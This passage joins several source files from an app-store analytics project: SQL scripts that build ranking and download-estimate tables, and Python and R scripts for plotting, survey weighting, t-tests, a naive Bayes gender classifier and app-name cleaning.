null AS estimate_extrapolated,
null AS n,
null AS rsquare,
null AS fit_order,
null AS stdev,
null AS df
FROM temp.ranking_application_data r
LEFT JOIN temp.in_app i ON i.application_id = r.application_id
LEFT JOIN temp.download_data_per_parent_app t
ON t.date = r.date
AND t.country_id=r.country_id
AND t.type=r.type
AND t.application_id = r.application_id
AND t.usable_split_data = 0
;
UPDATE temp.application_data a
JOIN temp.transactional_data_split s ON
a.date = s.date AND
a.device_id = s.device_id AND
a.country_id = s.country_id AND
a.type = s.type AND
a.application_id = s.application_id
SET a.real_value = s.value,
a.universal_app = 0,
a.monitor_app = 1
;
<file_sep>/plotting/plot_time_series.py
import sys
import pandas as pd
import itertools
import pylab
import config
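# Usage: python plot_time_series.py <ios|android>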
week_dict = {0: '0-Mon', 1: '1-Tue', 2: '2-Wed', 3: '3-Thu', 4: '4-Fri', 5: '5-Sat', 6: '6-Sun'}
platform = sys.argv[1]
if platform == 'ios':
stores_dict = config.IOS_STORES_DICT
elif platform == 'android':
stores_dict = config.ANDROID_STORES_DICT
else:
raise Exception("Wrong platform type. Should be ios or android")
ios_ratio = pd.read_csv("ratios_weekly_%s.csv" % platform)
# if platform == 'ios':
# # Fix the lack of data in 2012-12-24
# ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-30') & (ios_ratio['weekday'] == 0), 'ratio'] = ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-23') & (ios_ratio['weekday'] == 6), 'ratio']
# ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-30') & (ios_ratio['weekday'] == 0), 'units'] = ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-23') & (ios_ratio['weekday'] == 6), 'units']
# ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-30') & (ios_ratio['weekday'] == 0), 'count'] = ios_ratio.ix[(ios_ratio['end_period'] == '2012-12-23') & (ios_ratio['weekday'] == 6), 'count']
ios_ratio['weekday'] = ios_ratio['weekday'].map(week_dict)
store_ids = ios_ratio['store_id'].unique()
units = ios_ratio['unit'].unique()
def normalize_ratios(df):
df['ratio_normalized'] = df['ratio'] / df['ratio'].sum()
return df
for (store_id, unit) in itertools.product(store_ids, units):
print(store_id, unit)
ios_ratio_us = ios_ratio[(ios_ratio['store_id'] == store_id) & (ios_ratio['unit'] == unit)]
    if ios_ratio_us.shape[0] == 0:
        continue  # skip empty store/unit combinations instead of stopping the whole loop
fig, axes = pylab.subplots(nrows=2, ncols=2, figsize=(18, 16))
fig.text(0.5, 0.04, '%s %s' % (stores_dict[store_id], unit.capitalize()), ha='center', va='center', fontsize=20)
ios_ratio_us = ios_ratio_us.groupby('end_period').apply(normalize_ratios).reset_index()
ios_ratio_us_ratio = ios_ratio_us.pivot(index="end_period", columns="weekday", values="ratio")
ios_ratio_us_ratio.plot(ax=axes[0, 0], title="Ratio")
ios_ratio_us_ratio_normalized = ios_ratio_us.pivot(index="end_period", columns="weekday", values="ratio_normalized")
ios_ratio_us_ratio_normalized.plot(ax=axes[0, 1], title="Normalized Ratio")
ios_ratio_units = ios_ratio_us.pivot(index="end_period", columns="weekday", values="units")
ios_ratio_units.plot(ax=axes[1, 0], title="Actuals")
ios_ratio_count = ios_ratio_us.pivot(index="end_period", columns="weekday", values="count")
ios_ratio_count.plot(ax=axes[1, 1], title="Num of Apps")
# ios_ratio_us.plot(title="%s_%s" % (stores_dict[store_id], unit), figsize=(10, 8))
pylab.savefig("figs/%s_raw/%s_%s.png" % (platform, stores_dict[store_id], unit))
<file_sep>/int-vs-m-benchmark/sql/android/1001g1-compute_weekly_average.sql
/*
Compute the weekly averages.
*/
DROP TEMPORARY TABLE IF EXISTS temp.weekly_rank_averages;
CREATE TEMPORARY TABLE temp.weekly_rank_averages(
date date NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
category_id smallint(5) unsigned NOT NULL,
`rank` SMALLINT(5) UNSIGNED NOT NULL,
average decimal(8,2) NOT NULL)
select
max(r.date) as date,
r.country_id,
r.type,
r.category_id,
r.rank,
avg(d.real_value) as average,
count(*) as n_sample
from
temp.rankings r
join temp.application_data d
using (date, country_id, type, application_id)
where
d.real_value is not null
and d.price_changed = 0
group by
r.country_id,
r.type,
r.category_id,
r.rank
;
<file_sep>/aa_au_model/correction/constants.py
__author__ = 'hgriffioen'
DATA_VERSION = 'v3.4.8'
DATA_FOLDER = 'data/'
ISO_CODE = 'US'
SAMPLE_BUCKET_PATH = '/s3mnt-projecta/aardvark-prod-pdx-ds-sample/'
#MDM_BUCKET_PATH = '/s3mnt-projecta/aa-monitor-prod-pdx-to-int-data/'
MDM_BUCKET_PATH = '/s3mnt-projecta/aardvark-prod-pdx-mdm-to-int/'
<file_sep>/weekly_weights/model_compare_v4.py
##
# KPI_analysis_ios_nonnuniv version 3
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: Simulate the SBE solution on the data set sent to Kaggle
##
import pandas as pd
#import os
#import config
#import operator
import math
import csv
import statsmodels.api as sm
import numpy as np
#from rpy import *
import matplotlib.pyplot as plt
import config
feed_type_format = {0: 'Free',
1: 'Paid',
2: 'Grossing',
101: 'Free',
100: 'Paid',
102: 'Grossing',
}
feed_market_format = {0: 'iPhone',
1: 'iPhone',
2: 'iPhone',
101: 'iPad',
100: 'iPad',
102: 'iPad',
}
result = None
gres = []
def fun(x, a):
return a * x
def plot_actuals(df):
    ########### Plot actuals vs estimates ################
for n,g in df.groupby(['Country', 'Market', 'Type']):
fig = plt.figure()
ax = fig.add_subplot(111)
p2, = ax.plot(g['estimate_final'], g['estimate_preview'], 'b.', alpha=0.4, label='estimate_preview')
p1, = ax.plot(g['estimate_final'], g['estimate_final'], 'r-', label='estimate_final')
ax.legend(loc='best', prop={'size':10})
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('estimate_final')
plt.ylabel('estimate_preview')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/difference/%s.png'%title)
def preprocess_metadata(df):
df['Country'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
df['Type'] = df['feed_id'].apply(lambda x: feed_type_format[x])
df['Market'] = df['feed_id'].apply(lambda x: feed_market_format[x])
return df
def get_stats(df):
result = []
ranges = [[1,20],
[21,200],
[201,10000]
]
for n,g in df.groupby(['Country', 'Market', 'Type', 'date']):
g = g.sort(['estimate_final'], ascending=False)
        for rank_range in ranges:  # avoid shadowing the built-in range()
            t = g[rank_range[0]:rank_range[1]].mean()
            top = pd.DataFrame(columns=t.index.values)
            top = top.append(t, ignore_index=True)
            top['range'] = str(rank_range)
top['Country'] = n[0]
top['Market'] = n[1]
top['Type'] = n[2]
top['Date'] = n[3]
result.append(top)
result = pd.concat(result)
del result['date']
result.to_csv('data/preview_vs_final.csv', index=False)
return result
def main():
global result
global gres
metadata_f = '/Users/perezrafael/appannie/data/preview_final/daily_estimates_preview/daily_estimates_ios.csv'
df_preview = pd.read_csv(metadata_f)
metadata_f = '/Users/perezrafael/appannie/data/preview_final/daily_estimates_final/daily_estimates_ios_final.csv'
df_final = pd.read_csv(metadata_f)
g_merge = pd.merge(df_preview, df_final, on = ['store_id', 'feed_id', 'date', 'app_id'], how = 'inner', suffixes=('_preview', '_final'))
#g_merge = g_merge.dropna()
g_merge = preprocess_metadata(g_merge)
g_merge['gap'] = (g_merge['estimate_preview'] - g_merge['estimate_final']) *1.0
g_merge['gap_abs'] = g_merge['gap'].abs()
g_merge['gap_perc'] = g_merge['gap_abs']*1.0 / g_merge['estimate_preview']
get_stats(g_merge)
print g_merge['date'].min(), g_merge['date'].max()
plot_actuals(g_merge)
if __name__ == '__main__':
main()<file_sep>/google-analytics/r_codes/t-score.R
tscore = function(t1_mean, t2_mean, t1_var, t2_var, n1, n2)
{
return ((t1_mean - t2_mean) / sqrt(t1_var / n1 + t2_var / n2))
}
compare_score = function(t1, t2, s1, s2, n1, n2)
{
ts = tscore(t1, t2, s1, s2, n1, n2)
print(ts)
print(2*pnorm(-abs(ts)))
df = (s1/n1 + s2/n2 )^2 / ( (s1/n1)^2 / (n1-1) + (s2/n2)^2 / (n2-1) )
print(df)
print(2 * pt(-abs(ts), df = df))
}
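# Note: compare_score implements Welch's unequal-variance t-test: it prints the
# t statistic, a normal-approximation p-value, the Welch-Satterthwaite degrees
# of freedom, and the t-distribution p-value (t1/t2 are means, s1/s2 variances).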
# Medium sample size
t1 = 360.9874
t2 = 307.3790514
s1 = 212096.5753
s2 = 254456.5094
n1 = 25
n2 = 2667
compare_score(t1, t2, s1, s2, n1, n2)
# Very small sample size
t1 = 54.6033
t2 = 124.9380
s1 = 445.6876
s2 = 38427.058
n1 = 3
n2 = 264
compare_score(t1, t2, s1, s2, n1, n2)
<file_sep>/int-vs-m-benchmark/sql/android/1001d1-prepare_application_data-join_transactional.sql
/*
FUNCTIONAL DESCRIPTION : Check whether transactional data apps are ranked in the selected period
INPUT TABLE(S) : temp.rankings,
temp.transactional_data
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) : temp.application_data
QUERY STEPS :
*/
-- RETRIEVING APPLICATION DATA FROM RANKINGS --
/*
The index contains also the application_id (in the Apple App store algorithm this is not the case)
because multiple applications can have the same rank for a given (country_id, type, category_id)
due to collection of ranking data using multiple devices.
*/
DROP TEMPORARY TABLE IF EXISTS temp.application_data;
CREATE TEMPORARY TABLE temp.application_data(
date DATE NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
application_id int(10) unsigned NOT NULL,
price_usd decimal(9,2) DEFAULT NULL,
price_changed bool NULL,
real_value decimal(9,2) DEFAULT NULL,
preinstalled_value decimal(9,2) DEFAULT NULL,
estimate decimal(9,2) DEFAULT NULL,
estimate_source VARCHAR(50) DEFAULT NULL,
estimate_category_id smallint(5) unsigned DEFAULT NULL,
estimate_rank smallint(5) unsigned DEFAULT NULL,
estimate_extrapolated TINYINT unsigned DEFAULT NULL,
n smallint(5) unsigned DEFAULT NULL,
rsquare decimal(5,4) DEFAULT NULL,
fit_order TINYINT unsigned DEFAULT NULL,
stdev decimal(5,4) DEFAULT NULL,
df TINYINT unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
type,
application_id),
INDEX category_index (
application_id,
type,
country_id)
)
SELECT
r.date,
r.country_id,
r.type,
r.application_id,
r.price_usd,
NULL AS price_changed,
t.value AS real_value,
null AS preinstalled_value,
null AS estimate,
null AS estimate_source,
null AS estimate_category_id,
null AS estimate_rank,
null AS estimate_extrapolated,
null AS n,
null AS rsquare,
null AS fit_order,
null AS stdev,
null AS df
FROM temp.rankings r
LEFT JOIN temp.transactional_data t
ON t.country_id = r.country_id
AND t.date = r.date
AND t.type = r.type
AND t.application_id = r.application_id
group by r.date, r.country_id, r.type, application_id
;
/*
Check to see if price has changed over the given date range
Use this to update temp.application_data
*/
DROP TEMPORARY TABLE IF EXISTS temp.application_data_price_changes;
CREATE TEMPORARY TABLE temp.application_data_price_changes
(CONSTRAINT PRIMARY KEY (application_id,type,country_id))
as
SELECT
application_id,
type,
country_id,
IF(MAX(t.price_usd) <> MIN(t.price_usd),1,0) AS price_changed
FROM
temp.application_data t
group by
country_id,
type,
application_id
;
UPDATE temp.application_data a
JOIN temp.application_data_price_changes p ON a.application_id = p.application_id AND a.country_id = p.country_id
SET a.price_changed = p.price_changed
;
<file_sep>/audience/legacy_experiments/model_ipv1.py
##
# model python version 2
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: Naive Bayes gender model for review demographics
#
#
##
import re
from nltk import NaiveBayesClassifier
import nltk.classify
from nltk.tokenize import wordpunct_tokenize
from nltk.corpus import stopwords
from collections import defaultdict
import pandas as pd
import os
from unidecode import unidecode
#import statsmodels.formula.api as sm
#import statsmodels.regression.linear_model as sm
#import statsmodels.api as sm
#from sklearn.svm import SVR
#import numpy as np
#import datetime as dt
def get_male_probability(text, ex_word_set, classifier):
features = gen_features(text, ex_word_set)
return classifier.prob_classify(features)
def gen_features(text, ex_word_set):
clean_text = text.encode('utf-8')
#print clean_text
#clean_text = unidecode(text.decode('utf-8', errors='ignore'))
clean_text = re.sub('3D', '', clean_text)
clean_text = re.sub('<(.|\n)*?>', '', clean_text)
clean_text = re.sub('&\w+;', '', clean_text)
clean_text = clean_text.replace('\n', '').lower()
tokens = wordpunct_tokenize(clean_text)
#tokens = tokens.apply(lambda x: [w for w in x if re.search('[a-zA-Z]', w) and len(w) > 1])
tokens = set(tokens)
tokens = tokens.difference(ex_word_set)
    features = {}  # plain dict of token -> True presence features
for t in tokens:
features[t] = True
return features
def main():
global ver
global result_dir
ver = 'v1'
data_dir = '/Users/perezrafael/appannie/data/demie'
#data_dir = '/home/antony/data/benchmark_ios'
output_dir = 'output_%s'%ver
if not os.path.exists(output_dir):
os.makedirs(output_dir)
metadata_path = '%s/blog-gender-dataset.xlsx'%(data_dir)
xlsxfile = pd.ExcelFile(metadata_path)
df_obs = xlsxfile.parse('data', index_col = None)
sw = stopwords.words('english')
sw.extend(['ll', 've'])
df_obs = df_obs.dropna()
df_obs = df_obs.drop_duplicates()
#df_obs = df_obs.applymap(str)
df_obs['gender'] = df_obs['gender'].apply(lambda x: x.strip().upper())
#df_obs['pos_tag'] = df_obs['blog_text'].apply(lambda x: nltk.pos_tag(x))
features_labels = []
for row in df_obs.iterrows():
features = gen_features(row[1]['blog_text'], sw)
features_labels.append((features, row[1]['gender']))
#print features_labels
gender_classifier = NaiveBayesClassifier.train(features_labels)
#gender_classifier.show_most_informative_features(10)
test_text = 'do you know how to make dinner? sure! Fabulous!'
print test_text
result = get_male_probability(test_text, sw, gender_classifier)
print 'Male Probability = ' + str(round(result.prob('M'),3))
print 'Female Probability = ' + str(round(result.prob('F'),3))
print '======== Done'
pass
if __name__ == '__main__':
main()<file_sep>/financial-product-benchmark/automated-QA/procedures.py
__author__ = 'srhmtonk'
import matplotlib.pyplot as plt
import datetime
import seaborn as sns
sns.set(font="serif")
from itertools import product
def plot_curves(store, country, end_date, device_feed, data, min_rank=1, max_rank=1000, ax=None, scale='log'):
sel = (data.store == store)&(data.country == country)&\
(data.end_date == end_date)&(data.device_feed == device_feed)&\
(data['rank']>=min_rank)&(data['rank']<=max_rank)
if ax is None:
f,ax = plt.subplots()
ax.plot(data[sel]['rank'],data[sel].value_cla,'b-',label='classic')
ax.plot(data[sel]['rank'],data[sel].value_fin,'g-',label='financial')
ax.legend()
ax.set_xscale(scale)
ax.set_yscale(scale)
ax.set_xlim(min_rank,max_rank)
ax.set_title(store+' - '+country+' - '+end_date+' - '+device_feed)
ax.set_xlabel('rank')
ax.set_ylabel('estimate')
    # Resize via the axes' parent figure so this also works when an Axes is passed in.
    ax.get_figure().set_size_inches(8, 4)
return ax
def plot_time_serie_app(store, country, device_feed, app_id, data, ax=None, scale='linear'):
sel = (data.store == store)&(data.country == country)&\
(data.app_id == app_id)&(data.device_feed == device_feed)
if ax is None:
f,ax = plt.subplots()
ax.plot(data[sel].end_date.apply(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d").date()),
data[sel].value_cla,'b-o',label='classic')
ax.plot(data[sel].end_date.apply(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d").date()),
data[sel].value_fin,'g-o',label='financial')
ax.legend()
ax.set_yscale(scale)
ax.set_title(store+' - '+country+' - '+device_feed+' - app_id '+str(app_id))
ax.set_xlabel('end_date')
ax.set_ylabel('estimate')
    ax.get_figure().set_size_inches(8, 4)
return ax
def plot_time_serie_rank(store, country, device_feed, rank, data, ax=None, scale='linear'):
sel = (data.store == store)&(data.country == country)&\
(data['rank'] == rank)&(data.device_feed == device_feed)
if ax is None:
f,ax = plt.subplots()
ax.plot(data[sel].end_date.apply(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d").date()),
data[sel].value_cla,'b-o',label='classic')
ax.plot(data[sel].end_date.apply(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d").date()),
data[sel].value_fin,'g-o',label='financial')
ax.legend()
ax.set_yscale(scale)
ax.set_title(store+' - '+country+' - '+device_feed+' - rank#'+str(rank))
ax.set_xlabel('end_date')
ax.set_ylabel('estimate')
    ax.get_figure().set_size_inches(8, 4)
return ax
def bucket_diff(data, country, store, max_rank=200):
    base_sel = (data.store == store) & (data.country == country)
feeds = ['revenue','free','paid']
devices = ['ipad','iphone']
ax_rows,ax_cols = 2,3
f,axes = plt.subplots(ax_rows,ax_cols)
ax_ix = 0
for device,feed in product(devices,feeds):
        ax_i_row, ax_i_col = divmod(ax_ix, ax_cols)
axs = axes[ax_i_row,ax_i_col]
        # Restrict to the requested store/country as well as this device/feed.
        sel = base_sel & (data.device_feed == '%s_%s' % (device, feed)) & (data['rank'] <= max_rank)
sel_df = data[sel][['bucket','rel_diff']]
sns.boxplot(sel_df.rel_diff,sel_df.bucket,order=sel_df.bucket.unique(), ax=axs)
plot_title = device+' - '+feed
axs.set_title(plot_title)
axs.set_ylim(-0.5,0.5)
if ax_i_row+1<ax_rows:
axs.set_xlabel('')
if ax_i_col>0:
axs.set_ylabel('')
ax_ix+=1
f.set_size_inches(17,10)
f.suptitle('%s - %s - relative difference'%(store,country), fontsize=18, y = 1.04)
f.tight_layout()
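# Example usage, assuming `df` is the QA comparison frame with the columns used
# above (store, country, end_date, device_feed, rank, value_cla, value_fin):
#   ax = plot_curves('ios', 'US', '2015-06-27', 'iphone_free', df)
#   bucket_diff(df, 'US', 'ios')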
<file_sep>/evaluation/py/merge_est_and_real.py
import os
import sys
import os.path
from collections import defaultdict
import pandas as pd
import numpy as np
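# Usage: python merge_est_and_real.py <est_dir> <real_dir> <output_dir>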
def main():
print(sys.argv)
est_dir = sys.argv[1]
real_dir = sys.argv[2]
output_dir = sys.argv[3]
input_files = _listdir_with_fullpath(est_dir) + _listdir_with_fullpath(real_dir)
input_files = filter(lambda s: s.endswith('.csv'), input_files)
g = _group_est_and_real(input_files)
for (group_name, files) in g:
# They have to be pair.
if len(files) != 2:
continue
df = _merge_est_and_real(map(pd.read_csv, files))
df.to_csv(os.path.join(output_dir, group_name), index=False)
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _group_est_and_real(paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in paths:
d[os.path.basename(s)].append(s)
return d.iteritems()
def _merge_est_and_real(dfs):
# @note: Use inner join, because we only care the case where we have
# estimation and real values.
merged = pd.merge(*dfs, on=['app_id', 'date'], how='inner')
return merged.sort_index(by=['date'])
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/audience/audience/weight.py
import pandas as pd
SURVEY_PATH = '../data/survey_population_distribution_Q1_2015.csv'
def load_survey(platform, iso_code, device_type, modality='age_gender', mapping={}, survey_path=SURVEY_PATH):
"""
Load survey distribution for a given modality.
:param platform: Platform
:param iso_code: Survey country iso code
:param device_type: 'smartphone' or 'tablet'
:param modality: 'age', 'gender' or if crossed 'age_gender'
:param mapping: Mapping for modality if needed
:param survey_path: Path of survey to load
:returns DataFrame with survey stats
"""
survey = pd.read_csv(survey_path)
valid = survey[(survey.country.str.lower() == iso_code.lower()) &
(survey.platform.str.lower() == platform.lower()) &
(survey.device_type.str.lower() == device_type.lower())].copy()
valid.rename(columns={'population_counts': 'survey', 'age_bin': 'age'}, inplace=True)
for i in mapping.keys():
if mapping[i]:
valid[i] = valid[i].map(lambda x: mapping[i][x] if x in mapping[i] else x)
if modality == 'age_gender':
valid[modality] = valid['age'] + '_' + valid['gender']
valid.drop(['age', 'gender'], axis=1, inplace=True)
return valid[['country', 'platform', 'device_type', modality, 'survey']]
def compute_weighted_values(df, survey, var_cols, df_col, survey_col):
"""
Compute values after weight adjustment.
:param df: DataFrame with observations
:param survey: DataFrame with survey counts
:param var_cols: Variable columns in df and survey to compute the
distribution over
:param df_col: Column in df containing counts
:param survey_col: Column in survey containing counts
:return Series with weighted values of df_col per variable
"""
weights = compute_weights(df, survey, var_cols, df_col, survey_col)
combined = df.join(weights, on=var_cols)
combined['weighted_' + df_col] = combined['weight'] * combined[df_col]
diff = abs(combined['weighted_' + df_col].sum() - combined[df_col].sum())
assert diff < 1E-6, 'Incorrect weighting'
return combined['weighted_' + df_col]
def compute_weights(df, survey, var_cols, df_col, survey_col):
"""
Compute weights.
:param df: DataFrame with observations
:param survey: DataFrame with survey counts
:param var_cols: Variable columns in df and survey to compute the
distribution over
:param df_col: Column in df containing counts
:param survey_col: Column in survey containing counts
:return Series with weights per variable
"""
sample = compute_distribution(df, var_cols, df_col)
target = compute_distribution(survey, var_cols, survey_col)
weights = (target * 1. / sample)
weights.name = 'weight'
return weights
def compute_distribution(df, var_cols, cnt_col):
"""
Compute distribution over variables.
:param df: DataFrame
:param var_cols: List with variable columns
:param cnt_col: Column to compute the distribution over:
:return DataFrame with var_cols as index and distribution in cnt_col
"""
dist = df.groupby(var_cols)[cnt_col].sum() / df[cnt_col].sum()
return dist
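# Example (hypothetical numbers): if '18-24_male' makes up 30% of the sample but
# 20% of the survey population, compute_weights returns 0.2 / 0.3 ~= 0.67 for that
# cell, and compute_weighted_values rescales the observed counts by that factor.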
<file_sep>/int-vs-m-benchmark/sql/ios/1000g1-compute_weekly_average.sql
/*
Compute the weekly averages.
*/
DROP TEMPORARY TABLE IF EXISTS temp.weekly_rank_averages;
CREATE TEMPORARY TABLE temp.weekly_rank_averages(
date date NOT NULL,
device_id TINYINT unsigned NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
category_id smallint(5) unsigned NOT NULL,
`rank` SMALLINT(5) UNSIGNED NOT NULL,
average decimal(8,2) NOT NULL,
constraint primary key(
country_id,
device_id,
type,
category_id,
rank))
select
max(r.date) as date,
r.device_id,
r.country_id,
r.type,
r.category_id,
r.rank,
avg(d.real_value) as average,
count(*) as n_sample
from
temp.rankings r
join temp.application_data d
using (date, device_id, country_id, type, application_id)
where
d.real_value is not null
and d.universal_app = 0
and d.price_changed = 0
group by
r.device_id,
r.country_id,
r.type,
r.category_id,
r.rank
;
<file_sep>/evaluation/py/internal/stores_dict.py
ios = {
'feed_to_unit': {'0': 'Downloads', '1': 'Downloads', '100': 'Downloads',
'101': 'Downloads', '2': 'USD', '102': 'USD'},
'unit_to_feeds': {'Downloads': [0, 1, 100, 101],
'USD': [2, 102]},
'categories': [36] + range(6000, 6019) + range(6020, 6024) + range(7001, 7020),
'market_type': {'Market':['iPhone', 'iPhone', 'iPhone', 'iPad', 'iPad', 'iPad'],
'Type':['Free', 'Paid', 'Grossing', 'Free', 'Paid', 'Grossing'],
'feed_id':[0, 1, 2, 101, 100, 102]},
'category_dict': {36: u'Overall',
6000: u'Business',
6001: u'Weather',
6002: u'Utilities',
6003: u'Travel',
6004: u'Sports',
6005: u'Social Networking',
6006: u'Reference',
6007: u'Productivity',
6008: u'Photo and Video',
6009: u'News',
6010: u'Navigation',
6011: u'Music',
6012: u'Lifestyle',
6013: u'Health and Fitness',
6014: u'Games',
6015: u'Finance',
6016: u'Entertainment',
6017: u'Education',
6018: u'Books',
6020: u'Medical',
6021: u'Newsstand',
6022: u'Catalogs',
6023: u'Food and Drink',
7001: u'Action',
7002: u'Adventure',
7003: u'Arcade',
7004: u'Board',
7005: u'Card',
7006: u'Casino',
7007: u'Dice',
7008: u'Educational',
7009: u'Family',
7010: u'Kids',
7011: u'Music',
7012: u'Puzzle',
7013: u'Racing',
7014: u'Role Playing',
7015: u'Simulation',
7016: u'Sports',
7017: u'Strategy',
7018: u'Trivia',
7019: u'Word'},
'country_dict': {143441: u'United States', 143442: u'France', 143443: u'Germany',
143444: u'United Kingdom', 143445: u'Austria', 143446: u'Belgium',
143447: u'Finland', 143448: u'Greece', 143449: u'Ireland',
143450: u'Italy', 143451: u'Luxembourg', 143452: u'Netherlands',
143453: u'Portugal', 143454: u'Spain', 143455: u'Canada',
143456: u'Sweden', 143457: u'Norway', 143458: u'Denmark',
143459: u'Switzerland', 143460: u'Australia', 143461: u'New Zealand',
143462: u'Japan', 143463: u'Hong Kong', 143464: u'Singapore',
143465: u'China', 143466: u'South Korea', 143467: u'India',
143468: u'Mexico', 143469: u'Russia', 143470: u'Taiwan',
143471: u'Vietnam', 143472: u'South Africa', 143473: u'Malaysia',
143474: u'Philippines', 143475: u'Thailand', 143476: u'Indonesia',
143477: u'Pakistan', 143478: u'Poland', 143479: u'Saudi Arabia',
143480: u'Turkey', 143481: u'United Arab Emirates', 143482: u'Hungary',
143483: u'Chile', 143485: u'Panama', 143486: u'Sri Lanka',
143487: u'Romania', 143489: u'Czech Republic', 143491: u'Israel',
143493: u'Kuwait', 143494: u'Croatia', 143495: u'Costa Rica',
143496: u'Slovakia', 143497: u'Lebanon', 143498: u'Qatar',
143499: u'Slovenia', 143501: u'Colombia', 143502: u'Venezuela',
143503: u'Brazil', 143504: u'Guatemala', 143505: u'Argentina',
143506: u'El Salvador', 143507: u'Peru', 143508: u'Dominican Republic',
143509: u'Ecuador', 143510: u'Honduras', 143511: u'Jamaica',
143512: u'Nicaragua', 143513: u'Paraguay', 143514: u'Uruguay',
143515: u'Macau', 143516: u'Egypt', 143517: u'Kazakhstan',
143518: u'Estonia', 143519: u'Latvia', 143520: u'Lithuania',
143521: u'Malta', 143523: u'Moldova', 143524: u'Armenia',
143525: u'Botswana', 143526: u'Bulgaria', 143528: u'Jordan',
143529: u'Kenya', 143530: u'Macedonia', 143531: u'Madagascar',
143532: u'Mali', 143533: u'Mauritius', 143534: u'Niger',
143535: u'Senegal', 143536: u'Tunisia', 143537: u'Uganda',
143538: u'Anguilla', 143539: u'Bahamas', 143540: u'Antigua and Barbuda',
143541: u'Barbados', 143542: u'Bermuda', 143543: u'British Virgin Islands',
143544: u'Cayman Islands', 143545: u'Dominica', 143546: u'Grenada',
143547: u'Montserrat', 143548: u'St. Kitts and Nevis', 143549: u'St. Lucia',
143550: u'St. Vincent and The Grenadines', 143551: u'Trinidad and Tobago', 143552: u'Turks and Caicos',
143553: u'Guyana', 143554: u'Suriname', 143555: u'Belize',
143556: u'Bolivia', 143557: u'Cyprus', 143558: u'Iceland',
143559: u'Bahrain', 143560: u'Brunei', 143561: u'Nigeria',
143562: u'Oman', 143563: u'Algeria', 143564: u'Angola',
143565: u'Belarus', 143566: u'Uzbekistan', 143568: u'Azerbaijan',
143571: u'Yemen', 143572: u'Tanzania', 143573: u'Ghana',
143575: u'Albania', 143576: u'Benin', 143577: u'Bhutan',
143578: u'Burkina Faso', 143579: u'Cambodia', 143580: u'Cape Verde',
143581: u'Chad', 143582: u'Congo', 143583: u'Fiji',
143584: u'Gambia', 143585: u'Guinea-Bissau', 143586: u'Kyrgyzstan',
143587: u'Laos', 143588: u'Liberia', 143589: u'Malawi',
143590: u'Mauritania', 143591: u'Micronesia', 143592: u'Mongolia',
143593: u'Mozambique', 143594: u'Namibia', 143484: u'Nepal',
143595: u'Palau', 143597: u'Papua New Guinea', 143598: u'Sao Tome and Principe',
143599: u'Seychelles', 143600: u'Sierra Leone', 143601: u'Solomon Islands',
143602: u'Swaziland', 143603: u'Tajikistan', 143604: u'Turkmenistan',
143492: u'Ukraine', 143605: u'Zimbabwe'}
}
android = {
'unit_to_feeds': {'Downloads': [0, 1],
'USD': [2] },
'categories': range(1, 38),
'feed_to_unit': {'0': 'Downloads', '1': 'Downloads', '2': 'USD'},
'country_dict': {
1: u'Australia',
2: u'Canada',
3: u'China',
4: u'Germany',
5: u'Spain',
6: u'France',
7: u'United Kingdom',
8: u'Italy',
9: u'Japan',
10: u'United States',
11: u'Belgium',
12: u'Switzerland',
13: u'Chile',
14: u'South Africa',
15: u'Vietnam',
16: u'Hong Kong',
17: u'Argentina',
18: u'Brazil',
19: u'India',
20: u'Finland',
21: u'Indonesia',
22: u'Russia',
23: u'Netherlands',
24: u'Malaysia',
25: u'Turkey',
26: u'Mexico',
27: u'South Korea',
28: u'Poland',
29: u'Thailand',
30: u'Taiwan',
31: u'Philippines',
32: u'Singapore',
33: u'Egypt',
34: u'Sweden',
35: u'Austria'
}
}
<file_sep>/exact-matching-improvement/lib/features_aa.py
# -*- coding: utf-8 -*-
import re
import temp_database
DNAExcludedTermsType = {'ADDRESS':(1, 'address'),
'APP_NAME': (2, 'app_name'),
'COMPANY_SUFFIX':(3, 'company_suffix'),
'COUNTRY_ABBR': (4, 'country_abbr'),
'COUNTRY_DOMAIN':(5, 'country_domain'),
'GLOBAL_DOMAIN': (6, 'global_domain'),
'PREFIX_WORD':(7, 'prefix_word'),
'PREP': (8, 'prep'),
'WEBHOST_DOMAIN': (9, 'webhost_domain')}
class Cleaner():
def __init__(self):
self.app_name_filter_list = [' iPhone',' Android',' iPad',' Pad','ipod','ipod touch',' free','Ad','Ads',
'Ad-free','ads-free','HD','FreePlay','premium','PLUS','Plus\\+','Deluxe','Pro',
'Professional','Platinum','Lite','version','edition','for kids',
'for private groups','for_kids','for_private groups','Free\\+','\\+\\+','AR',
'Full free','RPG','MMORPG','XL','Elite','BAND','Official App','mobile','digital',
'epaper','e-paper','replica','magazine','per','online','for kakao','graalonline',
'Abby Monkey','Free Music Downloader','Metronome','tinder box','Appstar',
'Splash Math','Vocabulary Trainer','Human','Revista']
self.prefix_words = ['a', 'an', 'the', 'de', 'il', 'le', 'les']
self.generate_regular_express()
def generate_regular_express(self):
self.app_clean_content_filter_RE = re.compile('\+\+|' + '|'.join([r'\b%s\b' % c for c in self.app_name_filter_list]), re.I)
self.app_clean_content_dash_RE = re.compile(r'(\-|_|\bby) .*')
self.app_clean_content_brackets_RE = re.compile(r'\([^\)]+\)|\[[^\]]+\]')
self.app_clean_suffix_last_char_RE = re.compile(r'([^\w\+\!]+)$')
